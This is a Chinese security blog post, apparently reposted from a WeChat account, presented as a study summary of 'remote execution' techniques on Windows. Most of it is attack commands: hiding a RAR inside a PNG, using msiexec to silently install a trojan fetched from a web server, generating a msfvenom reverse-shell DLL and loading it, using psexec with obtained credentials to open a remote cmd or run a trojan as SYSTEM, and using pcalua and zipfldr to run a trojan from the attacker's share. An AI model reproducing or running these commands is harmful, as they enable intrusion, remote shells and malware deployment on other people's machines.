隔空执行的学习总结

admin 2024年10月24日23:54:25评论19 views字数 1626阅读5分25秒阅读模式

目录:

1、计算机对于文件类型分辨方式

2、文件合并隐藏方式

3、生成msi类型txt木马静默安装

4、使用pstools,在只有对方用户名和密码的情况下运行对方cmd

5、运行访问对方共享文件

我们这里需要先了解一些基础知识。

1、计算机对于文件类型分辨方式

计算机对于文件的分辨方式

文件头的作用:

告诉系统,把下面的二进制代码,当作什么来执行!!!!!

操作系统为了方便用户使用,使用后缀名机制:

.exe .dll .jpg .jpeg .png .avi .mp3 .mp4.....

PE文件(exe程序)

PE头,代码段,函数,资源,结尾

进行文件合并:

copy 1.png /b + 2.rar /b 3.png

合并1.png和2.rar为3.png

隔空执行的学习总结

通过合并rar和txt的文件,这里图片可以正常显示,通过修改后缀可以切换不同解析,换成压缩包后缀可以重新解析为压缩包可以正常打开

.

通过txt来执行木马程序

把haha.txt放到某个web目录里

msi=静默安装

这里我们假设已经入侵成功需要运行某个软件

默认位置:

c:/windows/system32/msiexec.exe

c:/windows/syswow64/msiexec.exe

远程加载木马到电脑上运行

msiexec /q /i http://192.168.119.135/go.txt

隔空执行的学习总结

成功实现隔空执行

这里我们通过将txt文件存入网站中然后在对方电脑中通过msi进行一个静默安装

通过dll执行

msfvenom -p windows/x64/shell/reverse_tcp lhost=[黑客ip] lport=4444 -f dll > haha.dll
msiexec /y haha.dll
rundll32.exe shell32.dll,Control_RunDLL ./haha.dll

--------------

forfiles执行

forfiles.exe /q c:windowssystem32 /m cmd.exe /c "msiexec /q /i web的IP地址/msi.txt"

隔空执行的学习总结

只知道管理员用户名和密码(这里实验对象最好是administrator主机,否则会出问题)

默认情况下的系统管理员administrator帐户是处于禁用状态,那么接下来给大家分享win7开启administrator帐户步骤。

  1、找到计算机,右击打开菜单选择“管理”选项,如下图所示:

  隔空执行的学习总结

  2、选择本地用户和组,点击用户,找到“Administrator”帐户,如下图所示:

  隔空执行的学习总结

  3、取消勾选“帐户已禁用”,点击确定,如下图所示:

隔空执行的学习总结

使用pstools微软官方自带的系统插件

准备工作:

1.目标主机的防火墙最好关闭

2.创建/获得对方计算机的用户名密码

直接控制对方cmd

psexec \目标ip -u [目标用户名] -p [密码] cmd.exe

隔空执行的学习总结

控制对方电脑运行自己的c盘的xk.exe

psexec \目标ip -u [目标用户名] -p [密码] -c c:xk.exe

远程运行对方电脑的notepad.exe

psexec \目标ip -u [目标用户名] -p [密码] -d notepad.exe

以system权限运行自己电脑的xk.exe

psexec \目标ip -u [目标用户名] -p [密码] -s -c c:xk.exe

以system权限运行对方的notepad.exe

psexec \目标ip -u [目标用户名] -p [密码] -s -d notepad.exe

pcalua提权

处理情况:

1.当前电脑硬盘不能用

2.自己权限不高

在目标上运行黑客电脑c盘的xk.exe

pcalua -m -a \黑客ipc$xk.exe

这样可以在对方电脑上运行自己电脑上的一个木马文件,可以用于内网

隔空执行的学习总结

查询电脑共享的文件

隔空执行的学习总结

---------------

zipfldr执行共享程序

rundll32.exe zipfldr.dll,RouteTheCall \黑客ipc$xk.exe

原文始发于微信公众号(白安全组):隔空执行的学习总结

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月24日23:54:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   隔空执行的学习总结https://cn-sec.com/archives/1844918.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息